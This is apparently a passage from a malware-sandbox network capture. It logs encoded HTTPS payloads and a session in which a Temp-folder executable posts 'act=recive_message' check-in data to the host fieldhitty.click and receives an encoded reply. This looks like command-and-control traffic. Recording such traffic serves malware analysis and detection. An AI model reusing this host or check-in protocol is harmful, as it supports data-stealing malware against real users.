2024-12-22 01:18:48 UTC	244	IN	Data Raw: 31 63 63 32 0d 0a 59 73 53 79 5a 56 55 33 31 32 39 4a 54 4a 58 74 4b 6c 61 49 41 54 6b 46 53 53 4a 72 5a 34 77 4b 74 6d 38 37 4e 45 6a 68 73 6b 67 5a 35 73 52 48 62 77 50 37 54 54 6f 70 74 39 64 65 4a 50 31 6b 46 53 63 6f 52 6b 6c 64 36 6d 76 61 48 46 34 59 61 70 66 66 61 6c 69 69 30 77 6b 6d 55 76 74 4e 4c 44 53 33 31 33 45 74 71 6d 52 58 4a 33 4d 41 44 67 33 75 61 39 6f 4e 57 6c 38 6e 6b 64 34 72 43 71 6a 56 44 54 42 55 73 77 34 6c 49 66 43 49 54 7a 66 69 62 31 42 6f 49 55 39 4a 53 36 35 76 7a 45 30 42 46 67 57 45 78 69 6b 76 70 63 45 4f 64 30 72 37 46 47 73 70 2b 38 38 51 64 4f 6c 6b 57 32 6b 76 52 67 41 50 35 47 4c 53 44 46 39 65 4f 49 6a 55 49 41 71 6d 31 67 77 36 58 61 63 44 4c 79 62 37 6a 6b 55 33 71 69 30 62 59 44 Data Ascii: 1cc2YsSyZVU3129JTJXtKlaIATkFSSJrZ4wKtm87NEjhskgZ5sRHbwP7TTopt9deJP1kFScoRkld6mvaHF4Yapffalii0wkmUvtNLDS313EtqmRXJ3MADg3ua9oNWl8nkd4rCqjVDTBUsw4lIfCITzfib1BoIU9JS65vzE0BFgWExikvpcEOd0r7FGsp+88QdOlkW2kvRgAP5GLSDF9eOIjUIAqm1gw6XacDLyb7jkU3qi0bYD
2024-12-22 01:18:48 UTC	1369	IN	Data Raw: 4d 41 55 55 57 39 57 74 63 63 53 45 4d 6e 6b 39 5a 71 48 2b 6a 4a 52 7a 42 5a 39 56 56 72 4a 76 75 42 54 54 66 6c 5a 46 70 6e 4f 55 38 4a 42 75 5a 67 30 41 64 57 57 53 57 4e 32 69 30 49 72 39 63 49 4d 46 32 7a 41 69 68 75 75 63 39 50 4c 4b 6f 37 47 30 63 37 51 77 6f 52 34 33 6d 55 45 68 64 50 61 6f 54 63 61 6c 6a 6d 31 67 6b 32 57 4c 55 66 49 79 58 38 69 6c 6f 2f 34 32 35 57 5a 79 5a 4b 42 67 62 75 62 39 34 48 56 6c 77 75 6a 74 30 73 41 4b 61 51 53 58 64 53 72 55 31 7a 62 74 53 4b 57 44 50 6d 64 52 6c 64 61 31 39 48 48 4b 35 76 32 45 30 42 46 69 4b 47 30 79 6b 4c 71 64 4d 50 50 45 65 31 48 79 30 6a 38 70 31 4f 4d 65 52 70 57 48 55 68 54 67 38 47 35 32 50 64 43 46 35 53 61 73 32 51 4c 52 6a 6d 69 45 63 57 57 4c 34 42 49 54 6e 33 7a 31 64 36 38 79 4e 63 61 Data Ascii: MAUUW9WtccSEMnk9ZqH+jJRzBZ9VVrJvuBTTflZFpnOU8JBuZg0AdWWSWN2i0Ir9cIMF2zAihuuc9PLKo7G0c7QwoR43mUEhdPaoTcaljm1gk2WLUfIyX8ilo/425WZyZKBgbub94HVlwujt0sAKaQSXdSrU1zbtSKWDPmdRlda19HHK5v2E0BFiKG0ykLqdMPPEe1Hy0j8p1OMeRpWHUhTg8G52PdCF5Sas2QLRjmiEcWWL4BITn3z1d68yNca
2024-12-22 01:18:48 UTC	1369	IN	Data Raw: 4b 34 32 53 55 51 78 6c 52 4d 73 4f 49 61 69 71 6c 78 41 51 39 46 34 41 4f 4a 53 44 77 6d 51 67 72 70 48 6f 62 59 43 63 41 55 55 58 6a 61 64 77 4c 53 31 6b 6e 67 4e 34 6b 44 36 50 66 44 7a 64 56 75 41 67 76 4a 66 79 4d 52 54 44 34 61 56 74 76 4c 6b 45 44 44 36 34 6d 6c 41 70 42 46 6e 4c 44 34 54 30 4c 35 4f 55 45 4f 56 75 79 47 32 73 78 75 5a 59 49 4d 2b 59 6a 41 79 63 6d 53 41 77 41 34 57 6e 65 41 31 78 63 4a 6f 76 65 4b 52 4b 70 31 41 63 37 58 62 38 41 4a 53 72 2f 68 6b 4d 2f 37 47 4e 61 62 57 73 4f 53 51 4c 32 4b 49 78 4e 62 56 45 6d 6a 74 39 6f 4e 61 58 65 43 54 42 44 39 52 4a 6c 4e 37 65 49 52 48 53 79 49 31 64 75 4b 30 73 44 41 65 35 76 32 51 68 61 55 53 6d 4f 31 79 41 4f 6f 64 51 4c 50 6c 69 7a 44 53 77 71 38 70 31 4e 50 65 5a 76 47 79 6c 72 52 78 Data Ascii: K42SUQxlRMsOIaiqlxAQ9F4AOJSDwmQgrpHobYCcAUUXjadwLS1kngN4kD6PfDzdVuAgvJfyMRTD4aVtvLkEDD64mlApBFnLD4T0L5OUEOVuyG2sxuZYIM+YjAycmSAwA4WneA1xcJoveKRKp1Ac7Xb8AJSr/hkM/7GNabWsOSQL2KIxNbVEmjt9oNaXeCTBD9RJlN7eIRHSyI1duK0sDAe5v2QhaUSmO1yAOodQLPlizDSwq8p1NPeZvGylrRx
2024-12-22 01:18:48 UTC	1369	IN	Data Raw: 6c 41 70 56 46 6e 4c 44 32 53 4d 53 71 4e 34 4f 4f 6c 4f 39 43 69 55 6a 2f 49 6c 44 4d 2b 31 6c 56 6d 38 6d 52 51 6f 45 36 6d 4c 47 44 6c 4a 63 4a 34 6d 51 5a 45 43 68 79 45 64 76 46 5a 49 42 41 6a 37 73 6e 56 35 30 39 53 31 43 4a 79 78 4d 53 56 32 75 61 39 73 45 56 6c 34 69 6a 4e 38 75 44 71 44 57 43 6a 4a 61 76 78 38 6a 49 50 71 45 52 7a 2f 34 59 31 5a 6a 4a 30 51 42 44 75 51 6f 6d 6b 31 65 54 6d 72 62 6b 42 38 4e 71 64 41 45 49 52 57 71 51 7a 4a 75 38 49 4d 49 62 4b 70 76 56 57 63 6b 54 41 55 4f 35 6d 6e 59 41 31 35 54 49 34 76 59 4f 41 47 69 32 41 59 35 57 72 51 4a 4c 69 76 7a 69 45 77 79 35 53 4d 56 4a 79 78 59 53 56 32 75 52 2f 4d 34 47 33 63 51 77 38 39 6b 47 65 62 58 43 33 63 4e 39 51 45 6f 49 76 2b 41 54 6a 33 6d 61 56 4a 73 4a 30 73 4e 43 65 64 Data Ascii: lApVFnLD2SMSqN4OOlO9CiUj/IlDM+1lVm8mRQoE6mLGDlJcJ4mQZEChyEdvFZIBAj7snV509S1CJyxMSV2ua9sEVl4ijN8uDqDWCjJavx8jIPqERz/4Y1ZjJ0QBDuQomk1eTmrbkB8NqdAEIRWqQzJu8IMIbKpvVWckTAUO5mnYA15TI4vYOAGi2AY5WrQJLivziEwy5SMVJyxYSV2uR/M4G3cQw89kGebXC3cN9QEoIv+ATj3maVJsJ0sNCed
2024-12-22 01:18:48 UTC	1369	IN	Data Raw: 46 63 73 6b 64 63 6a 45 71 6a 64 43 44 39 64 76 41 77 76 4b 2f 71 4a 52 44 37 72 5a 46 56 70 49 77 42 48 52 65 6c 77 6c 46 55 5a 64 7a 71 59 77 6a 77 4e 68 39 30 49 64 30 72 37 46 47 73 70 2b 38 38 51 64 4f 4e 78 58 32 6f 35 53 51 34 4c 34 57 76 47 44 46 52 64 4f 49 54 66 4c 67 65 71 31 67 67 78 56 4c 41 48 4a 79 6e 79 68 45 63 34 71 69 30 62 59 44 4d 41 55 55 58 41 59 38 63 61 57 6c 67 68 6c 63 74 71 48 2b 6a 4a 52 7a 42 5a 39 56 56 72 4c 66 79 45 54 44 54 6d 59 31 39 71 4b 31 49 47 41 75 6c 68 33 78 39 54 55 53 32 49 32 43 45 50 6f 4d 49 4c 4f 55 65 77 48 7a 6c 75 75 63 39 50 4c 4b 6f 37 47 31 45 73 55 42 6b 47 72 46 6e 43 44 6b 39 64 4a 34 2b 51 4e 55 36 2f 6b 41 41 37 46 65 31 4e 4c 53 48 2b 6a 45 63 31 34 32 39 57 59 69 4a 46 43 41 50 71 59 74 34 4e Data Ascii: FcskdcjEqjdCD9dvAwvK/qJRD7rZFVpIwBHRelwlFUZdzqYwjwNh90Id0r7FGsp+88QdONxX2o5SQ4L4WvGDFRdOITfLgeq1ggxVLAHJynyhEc4qi0bYDMAUUXAY8caWlghlctqH+jJRzBZ9VVrLfyETDTmY19qK1IGAulh3x9TUS2I2CEPoMILOUewHzluuc9PLKo7G1EsUBkGrFnCDk9dJ4+QNU6/kAA7Fe1NLSH+jEc1429WYiJFCAPqYt4N
2024-12-22 01:18:48 UTC	1369	IN	Data Raw: 79 65 4d 30 43 68 33 45 64 76 46 62 59 4b 4b 43 2f 39 68 6b 51 37 37 57 64 4a 62 53 78 53 43 41 54 6c 5a 64 67 4e 56 46 73 67 67 74 6b 6e 44 4b 76 58 41 44 68 51 39 55 4e 72 4b 65 2f 50 45 48 54 4c 62 6c 42 72 63 42 70 4a 47 71 42 78 6c 41 70 56 46 6e 4c 44 30 43 41 46 72 4e 30 45 4f 46 61 6e 44 43 30 38 39 34 4a 43 4a 75 42 6f 58 6d 6f 6d 54 51 6f 44 36 47 50 59 48 31 42 57 4b 59 69 51 5a 45 43 68 79 45 64 76 46 5a 59 61 50 53 54 77 67 31 34 2f 36 32 42 4e 61 6a 73 41 52 30 58 2f 62 38 56 4e 41 55 41 36 6c 4e 63 31 54 72 2b 51 41 44 73 56 37 55 30 74 4a 2f 47 49 54 6a 72 34 5a 6c 31 6f 4a 45 6b 41 41 65 5a 72 31 41 6c 64 55 53 2b 41 33 43 45 48 70 64 38 44 50 6c 75 38 41 6d 74 67 74 34 68 51 64 4c 49 6a 65 6e 77 6f 54 41 52 46 38 53 62 4e 54 56 35 61 61 Data Ascii: yeM0Ch3EdvFbYKKC/9hkQ77WdJbSxSCATlZdgNVFsggtknDKvXADhQ9UNrKe/PEHTLblBrcBpJGqBxlApVFnLD0CAFrN0EOFanDC0894JCJuBoXmomTQoD6GPYH1BWKYiQZEChyEdvFZYaPSTwg14/62BNajsAR0X/b8VNAUA6lNc1Tr+QADsV7U0tJ/GITjr4Zl1oJEkAAeZr1AldUS+A3CEHpd8DPlu8Amtgt4hQdLIjenwoTARF8SbNTV5aa
2024-12-22 01:18:48 UTC	281	IN	Data Raw: 59 35 76 41 4d 49 56 43 79 47 32 6b 62 39 49 46 47 4d 2f 77 6a 52 46 68 6c 41 41 59 66 72 6a 44 74 46 42 6c 52 4a 73 4f 49 61 68 57 68 30 41 41 74 51 37 49 42 4f 69 58 36 67 32 6f 37 37 58 56 59 61 43 68 52 41 45 6e 6c 5a 5a 52 44 47 56 45 79 77 34 68 71 4c 36 48 47 42 42 68 57 70 41 52 72 59 4c 65 49 58 6e 53 79 49 32 55 6e 4f 55 4d 5a 42 75 46 35 36 6b 30 42 54 78 54 44 32 7a 77 48 74 74 4d 52 50 46 69 35 48 42 56 75 72 39 73 61 5a 72 67 78 43 58 68 72 58 7a 5a 4c 72 6d 6d 55 56 57 42 50 61 70 57 51 63 6c 4c 6f 6b 42 56 33 44 66 56 4b 4b 44 7a 6c 69 55 73 69 36 53 52 6c 57 51 78 57 41 77 4c 2b 62 38 4d 43 47 52 68 71 6a 4a 42 79 4f 65 62 5a 41 43 78 45 6f 77 41 37 4b 62 65 77 42 6e 54 79 49 77 4d 6e 48 6b 4d 48 43 2b 6c 2b 78 55 42 2b 51 43 43 45 77 43 Data Ascii: Y5vAMIVCyG2kb9IFGM/wjRFhlAAYfrjDtFBlRJsOIahWh0AAtQ7IBOiX6g2o77XVYaChRAEnlZZRDGVEyw4hqL6HGBBhWpARrYLeIXnSyI2UnOUMZBuF56k0BTxTD2zwHttMRPFi5HBVur9saZrgxCXhrXzZLrmmUVWBPapWQclLokBV3DfVKKDzliUsi6SRlWQxWAwL+b8MCGRhqjJByOebZACxEowA7KbewBnTyIwMnHkMHC+l+xUB+QCCEwC
2024-12-22 01:18:48 UTC	1369	IN	Data Raw: 32 63 35 61 0d 0a 78 2b 45 31 35 56 76 48 65 61 46 42 6c 41 61 74 75 43 5a 45 43 30 6b 46 39 33 45 72 59 66 4f 53 6a 30 6d 55 74 7a 31 46 31 38 66 53 5a 47 48 68 54 51 56 74 4d 58 56 46 41 39 6b 70 77 2f 41 36 6a 65 41 43 45 56 2b 30 30 6b 62 71 2b 32 43 48 79 71 58 42 55 6e 4d 77 42 52 52 64 74 72 32 67 4e 65 51 44 76 4f 39 7a 41 4e 6f 4d 63 57 64 78 76 31 43 32 74 32 70 38 45 49 4d 50 73 6a 41 7a 64 35 47 31 78 57 75 54 69 47 45 68 64 50 61 70 57 51 63 6c 4c 6f 6b 42 56 33 44 66 56 4b 4b 44 7a 6c 69 55 73 69 36 53 52 6c 57 51 56 48 44 77 44 70 65 4a 59 6a 55 6b 49 74 77 35 35 71 44 2b 61 49 50 6e 63 64 39 54 4a 6c 62 75 2f 50 45 48 54 66 59 46 56 70 4c 46 59 59 53 4d 42 76 30 67 68 65 52 6d 69 74 32 7a 34 48 35 70 35 48 4d 52 58 74 58 57 56 75 38 35 34 Data Ascii: 2c5ax+E15VvHeaFBlAatuCZEC0kF93ErYfOSj0mUtz1F18fSZGHhTQVtMXVFA9kpw/A6jeACEV+00kbq+2CHyqXBUnMwBRRdtr2gNeQDvO9zANoMcWdxv1C2t2p8EIMPsjAzd5G1xWuTiGEhdPapWQclLokBV3DfVKKDzliUsi6SRlWQVHDwDpeJYjUkItw55qD+aIPncd9TJlbu/PEHTfYFVpLFYYSMBv0gheRmit2z4H5p5HMRXtXWVu854
2024-12-22 01:18:48 UTC	1369	IN	Data Raw: 42 78 5a 46 57 63 48 41 75 39 2b 78 42 70 57 47 51 53 31 38 52 51 2b 73 39 4d 4a 4f 56 4b 6a 48 47 74 67 74 34 41 49 62 4e 4d 6a 45 79 63 55 44 6b 6b 64 72 6a 43 55 4f 46 70 59 4a 49 54 47 4f 30 32 42 33 67 41 32 51 36 55 61 4a 47 48 5a 75 57 6c 30 70 43 4e 64 4a 33 4d 53 52 30 58 71 65 5a 52 56 43 51 52 78 31 6f 4e 39 55 50 54 50 53 53 34 56 6f 30 31 7a 66 4c 6e 50 57 6e 53 79 49 78 78 6b 4f 56 49 50 42 76 68 72 6b 7a 4e 6e 63 53 53 45 30 54 77 51 71 39 77 6d 4e 45 53 2f 4d 78 55 37 39 49 46 47 4d 2f 78 79 47 79 6c 72 54 30 6c 64 31 79 69 63 54 57 59 59 61 70 75 51 63 6b 43 54 30 77 6b 35 55 71 4d 63 5a 67 6e 35 69 45 6b 69 2b 6d 35 58 52 69 68 52 41 30 57 67 4b 4e 4a 4e 41 51 52 6b 77 39 51 37 51 50 36 41 56 57 77 41 35 6c 70 37 66 4f 6a 42 55 58 54 38 Data Ascii: BxZFWcHAu9+xBpWGQS18RQ+s9MJOVKjHGtgt4AIbNMjEycUDkkdrjCUOFpYJITGO02B3gA2Q6UaJGHZuWl0pCNdJ3MSR0XqeZRVCQRx1oN9UPTPSS4Vo01zfLnPWnSyIxxkOVIPBvhrkzNncSSE0TwQq9wmNES/MxU79IFGM/xyGylrT0ld1yicTWYYapuQckCT0wk5UqMcZgn5iEki+m5XRihRA0WgKNJNAQRkw9Q7QP6AVWwA5lp7fOjBUXT8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50205	104.21.89.115	443	7796	C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:49 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: fieldhitty.click
2024-12-22 01:18:49 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 76 62 41 72 5a 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PvbArZ--&j=
2024-12-22 01:18:50 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4acr1ae357rq3djmagg4i5gmqi; expires=Wed, 16 Apr 2025 19:05:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMdrz9SAjnpvJ1wHURdDSQKr0vti9ssHPrzpgi9V0WpWD9MmpX%2FBRj%2BccqD3ZhM3vnYFQBM64XazzlUVP%2FZI9%2Fla3%2BRGAP4WzaE0FoaWAYM0fBAc5f8MsAG4QW2pruyRKCiz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47b91f2a43a0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2047&min_rtt=2045&rtt_var=772&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=942&delivery_rate=1411992&cwnd=219&unsent_bytes=0&cid=e85ca01cf36eb25a&ts=935&x=0"
2024-12-22 01:18:50 UTC	244	IN	Data Raw: 33 35 33 33 0d 0a 70 64 41 73 44 4f 70 62 71 6c 35 6b 51 46 70 48 4a 77 56 62 41 31 75 58 57 6e 61 4e 6b 56 50 36 2f 47 30 2b 35 50 47 31 65 65 6a 65 38 6c 6f 75 30 47 2b 47 66 42 63 6c 65 48 31 54 64 79 35 6d 64 37 55 37 45 71 2b 72 4e 5a 75 51 48 6c 76 49 30 38 4d 55 79 70 2b 32 54 57 43 5a 50 6f 5a 38 41 54 68 34 66 58 78 2b 65 57 59 31 74 57 42 55 36 50 73 78 6d 35 41 50 58 34 2b 65 78 52 57 4c 7a 62 78 4c 5a 49 38 34 7a 6a 38 49 4c 54 38 69 51 6d 51 78 62 54 4c 36 4d 68 75 76 76 58 47 66 68 6b 38 45 78 72 7a 51 44 59 6e 6f 73 56 39 6e 79 43 61 47 4a 55 59 6c 4e 47 55 64 4a 7a 70 6d 4f 66 73 38 45 75 62 35 4f 35 4b 59 44 6c 71 4f 67 64 77 66 67 4d 32 79 53 47 57 46 4d 64 6f 79 41 69 6f 30 4a 45 68 6b 65 53 39 35 38 69 Data Ascii: 3533pdAsDOpbql5kQFpHJwVbA1uXWnaNkVP6/G0+5PG1eeje8lou0G+GfBcleH1Tdy5md7U7Eq+rNZuQHlvI08MUyp+2TWCZPoZ8ATh4fXx+eWY1tWBU6Psxm5APX4+exRWLzbxLZI84zj8ILT8iQmQxbTL6MhuvvXGfhk8ExrzQDYnosV9nyCaGJUYlNGUdJzpmOfs8Eub5O5KYDlqOgdwfgM2ySGWFMdoyAio0JEhkeS958i
2024-12-22 01:18:50 UTC	1369	IN	Data Raw: 42 55 74 37 4e 69 71 70 30 65 54 5a 4f 65 78 78 33 4b 32 50 78 58 4c 6f 38 31 69 47 52 47 4b 6a 51 72 51 47 51 32 5a 6a 6a 31 4b 68 76 76 38 44 6d 51 6d 67 56 54 69 5a 7a 5a 45 59 33 50 75 30 6c 68 6a 7a 48 4f 4d 77 56 69 64 6d 56 43 66 33 6b 35 65 64 55 6f 46 2b 7a 6e 50 49 6e 65 45 42 4b 66 30 39 41 58 79 70 2f 79 53 47 43 4a 4e 4d 67 75 44 69 6b 7a 49 46 64 73 4d 47 77 30 39 54 55 65 34 50 41 78 6e 35 51 46 55 34 79 58 32 68 61 4d 78 37 49 4f 49 4d 67 2b 30 48 78 65 59 68 73 67 56 57 41 31 64 33 76 50 65 41 75 68 36 6e 47 66 6b 6b 38 45 78 70 76 53 47 49 6e 4d 76 55 31 6d 67 79 76 49 4c 67 41 76 50 54 64 44 59 6a 64 72 4f 75 63 79 47 75 6e 77 4f 4a 4f 58 43 6c 75 43 30 35 6c 62 6a 64 2f 79 46 69 36 70 4e 4d 4d 77 44 44 55 34 5a 56 6f 70 49 43 45 2b 2b Data Ascii: BUt7Niqp0eTZOexx3K2PxXLo81iGRGKjQrQGQ2Zjj1Khvv8DmQmgVTiZzZEY3Pu0lhjzHOMwVidmVCf3k5edUoF+znPIneEBKf09AXyp/ySGCJNMguDikzIFdsMGw09TUe4PAxn5QFU4yX2haMx7IOIMg+0HxeYhsgVWA1d3vPeAuh6nGfkk8ExpvSGInMvU1mgyvILgAvPTdDYjdrOucyGunwOJOXCluC05lbjd/yFi6pNMMwDDU4ZVopICE++
2024-12-22 01:18:50 UTC	1369	IN	Data Raw: 38 50 4a 54 65 51 52 79 42 69 35 64 44 79 75 32 78 57 6d 32 43 65 2f 30 2f 43 43 77 2f 4d 77 56 34 64 33 68 35 38 6a 52 55 74 37 4d 38 6d 5a 59 4a 54 6f 6d 65 31 42 57 45 79 4c 64 42 5a 6f 67 35 78 54 6b 43 4b 54 4d 6d 53 47 4d 72 61 7a 6e 39 50 52 58 6c 2b 58 48 57 33 67 68 45 78 73 75 58 4b 70 33 4d 38 48 74 74 68 6a 66 50 4b 6b 59 39 64 6a 77 46 59 44 55 68 59 62 55 31 48 4f 72 32 50 70 6d 55 41 56 6d 4d 6e 39 38 56 69 64 57 39 53 6d 36 45 4d 63 49 78 43 43 59 77 4c 45 35 73 50 32 45 34 2f 33 68 61 72 2f 51 70 32 4d 5a 50 61 49 47 66 32 68 54 49 38 72 46 41 59 49 38 76 69 43 4e 49 4f 33 67 69 53 53 64 68 49 54 58 38 4f 42 2f 6c 39 7a 47 66 6b 77 70 66 67 5a 44 61 48 49 44 4a 74 55 70 69 67 54 54 4f 50 41 45 6d 50 54 64 41 62 6a 56 74 65 62 74 34 45 2f Data Ascii: 8PJTeQRyBi5dDyu2xWm2Ce/0/CCw/MwV4d3h58jRUt7M8mZYJTome1BWEyLdBZog5xTkCKTMmSGMrazn9PRXl+XHW3ghExsuXKp3M8HtthjfPKkY9djwFYDUhYbU1HOr2PpmUAVmMn98VidW9Sm6EMcIxCCYwLE5sP2E4/3har/Qp2MZPaIGf2hTI8rFAYI8viCNIO3giSSdhITX8OB/l9zGfkwpfgZDaHIDJtUpigTTOPAEmPTdAbjVtebt4E/
2024-12-22 01:18:50 UTC	1369	IN	Data Raw: 33 67 68 51 78 73 75 58 45 6f 50 56 76 45 42 6e 68 54 2f 41 4f 77 67 76 4d 79 4e 4f 59 44 35 6e 4e 50 30 31 45 65 7a 79 4e 5a 4b 4d 44 46 65 4d 6e 74 31 62 78 49 65 31 56 69 37 51 65 65 38 77 4c 7a 49 6a 4e 31 4d 6e 4a 69 38 67 74 54 38 59 72 36 74 78 6d 35 45 47 55 34 36 62 32 42 53 4f 79 62 52 49 59 34 30 32 77 69 34 4f 4c 44 55 75 53 6d 77 72 59 54 54 78 4e 42 44 6e 2b 44 76 59 30 45 39 62 6e 74 4f 50 57 37 2f 4b 76 55 35 74 6e 6e 6e 58 63 68 39 69 50 79 6b 46 50 33 6c 74 4e 2f 55 33 47 4f 50 34 4f 5a 6d 53 41 56 75 44 6d 74 38 54 6d 4d 61 32 52 6d 2b 47 4e 73 6b 34 41 79 63 38 49 6b 46 68 4e 69 46 33 74 54 38 4d 72 36 74 78 74 37 6b 36 48 71 65 70 6c 77 54 45 33 76 4a 4a 59 73 68 68 69 44 41 46 4c 6a 41 71 51 32 34 31 61 7a 44 2b 4e 42 2f 72 2f 7a 69 Data Ascii: 3ghQxsuXEoPVvEBnhT/AOwgvMyNOYD5nNP01EezyNZKMDFeMnt1bxIe1Vi7Qee8wLzIjN1MnJi8gtT8Yr6txm5EGU46b2BSOybRIY402wi4OLDUuSmwrYTTxNBDn+DvY0E9bntOPW7/KvU5tnnnXch9iPykFP3ltN/U3GOP4OZmSAVuDmt8TmMa2Rm+GNsk4Ayc8IkFhNiF3tT8Mr6txt7k6HqeplwTE3vJJYshhiDAFLjAqQ241azD+NB/r/zi
2024-12-22 01:18:50 UTC	1369	IN	Data Raw: 59 65 56 78 52 79 44 31 62 78 44 59 59 41 78 77 54 30 43 4a 7a 55 6a 53 57 30 34 5a 6a 66 37 4d 46 53 68 73 7a 61 41 33 6c 63 63 70 34 50 4d 43 5a 7a 4b 6b 30 4e 68 79 43 61 47 4a 55 59 6c 4e 47 55 64 4a 7a 42 7a 50 66 67 71 48 65 6a 39 50 70 75 4d 44 6c 47 4e 67 64 41 55 6a 73 43 2b 53 47 47 4f 4f 4d 30 32 43 69 55 39 4c 6b 70 72 65 53 39 35 38 69 42 55 74 37 4d 66 6b 34 30 59 58 34 69 59 77 51 44 4b 32 50 78 58 4c 6f 38 31 69 47 52 47 49 54 4d 75 51 57 63 31 59 54 33 34 4f 41 62 67 39 44 61 52 6c 52 31 57 67 5a 54 63 45 34 48 49 74 46 78 69 68 69 76 4e 4c 68 52 69 64 6d 56 43 66 33 6b 35 65 63 4d 2f 42 50 2f 77 63 36 6d 49 44 45 71 4e 6e 74 74 62 6c 59 6d 72 44 6d 6d 45 65 5a 42 38 41 43 30 78 4a 6b 70 6d 4d 47 30 30 38 44 45 52 37 76 55 31 6b 70 51 50 Data Ascii: YeVxRyD1bxDYYAxwT0CJzUjSW04Zjf7MFShszaA3lccp4PMCZzKk0NhyCaGJUYlNGUdJzBzPfgqHej9PpuMDlGNgdAUjsC+SGGOOM02CiU9LkpreS958iBUt7Mfk40YX4iYwQDK2PxXLo81iGRGITMuQWc1YT34OAbg9DaRlR1WgZTcE4HItFxihivNLhRidmVCf3k5ecM/BP/wc6mIDEqNnttblYmrDmmEeZB8AC0xJkpmMG008DER7vU1kpQP
2024-12-22 01:18:50 UTC	1369	IN	Data Raw: 68 56 6b 34 65 31 51 69 37 51 65 63 73 37 42 53 4d 79 4c 45 6c 6f 50 6d 55 72 2f 7a 38 47 37 76 49 36 6c 5a 49 50 55 59 75 5a 31 68 4b 48 79 37 39 4a 61 59 63 38 69 48 4a 47 4a 53 42 6c 48 53 63 59 62 44 4c 35 59 30 36 76 37 48 2b 42 33 67 68 51 78 73 75 58 47 34 44 43 75 45 4e 74 68 7a 72 61 50 51 41 77 4f 43 68 50 64 54 4e 71 50 50 67 31 47 65 7a 31 4e 35 4f 53 48 56 57 47 6b 4e 78 62 78 49 65 31 56 69 37 51 65 65 73 72 45 43 67 2f 4b 56 4e 73 4f 47 49 76 2b 43 68 55 6f 62 4d 67 6e 34 39 50 42 4a 43 44 77 42 79 56 69 61 73 4f 61 59 52 35 6b 48 77 41 4b 7a 34 69 51 32 6b 72 5a 44 2f 36 4e 78 33 6d 39 7a 6d 62 6e 67 74 59 67 5a 62 55 46 34 48 41 73 55 46 71 67 54 66 42 4d 30 5a 73 65 43 4a 64 4a 32 45 68 47 4f 34 37 47 4f 4b 7a 4c 74 61 48 54 31 75 4b 30 Data Ascii: hVk4e1Qi7Qecs7BSMyLEloPmUr/z8G7vI6lZIPUYuZ1hKHy79JaYc8iHJGJSBlHScYbDL5Y06v7H+B3ghQxsuXG4DCuENthzraPQAwOChPdTNqPPg1Gez1N5OSHVWGkNxbxIe1Vi7QeesrECg/KVNsOGIv+ChUobMgn49PBJCDwByViasOaYR5kHwAKz4iQ2krZD/6Nx3m9zmbngtYgZbUF4HAsUFqgTfBM0ZseCJdJ2EhGO47GOKzLtaHT1uK0
2024-12-22 01:18:50 UTC	1369	IN	Data Raw: 66 38 6d 35 6c 6e 6a 7a 50 4b 6b 51 58 4f 79 74 4c 59 43 38 68 4a 73 70 32 56 4f 44 70 63 63 43 6e 46 68 79 42 6e 35 64 44 79 74 4b 31 54 6d 6d 53 4c 38 38 77 46 79 6b 31 4b 57 64 6f 50 6e 63 36 2b 6a 73 46 35 72 38 36 6c 64 35 42 48 49 47 4c 6c 30 50 4b 36 4c 56 59 62 61 63 36 32 54 56 47 62 48 67 69 55 79 64 68 49 51 65 31 4b 68 66 2f 38 44 36 4a 6f 45 38 45 6e 36 32 58 45 4a 7a 41 6f 6b 31 34 67 7a 54 45 4c 54 68 69 59 48 45 58 4e 57 73 7a 61 2b 70 34 43 39 43 39 63 5a 6e 65 56 32 57 66 30 38 46 62 30 70 58 38 44 6e 7a 49 59 59 68 37 42 54 41 71 49 30 5a 78 4f 69 59 48 79 78 38 43 35 66 51 68 6e 34 6b 41 48 4d 6a 54 32 46 76 53 2f 76 4a 48 61 5a 4d 6f 33 6a 45 57 4a 58 67 61 43 79 63 68 49 57 47 31 44 52 66 68 2f 54 61 4f 6a 30 4a 37 6b 4a 6e 51 43 34 Data Ascii: f8m5lnjzPKkQXOytLYC8hJsp2VODpccCnFhyBn5dDytK1TmmSL88wFyk1KWdoPnc6+jsF5r86ld5BHIGLl0PK6LVYbac62TVGbHgiUydhIQe1Khf/8D6JoE8En62XEJzAok14gzTELThiYHEXNWsza+p4C9C9cZneV2Wf08Fb0pX8DnzIYYh7BTAqI0ZxOiYHyx8C5fQhn4kAHMjT2FvS/vJHaZMo3jEWJXgaCychIWG1DRfh/TaOj0J7kJnQC4
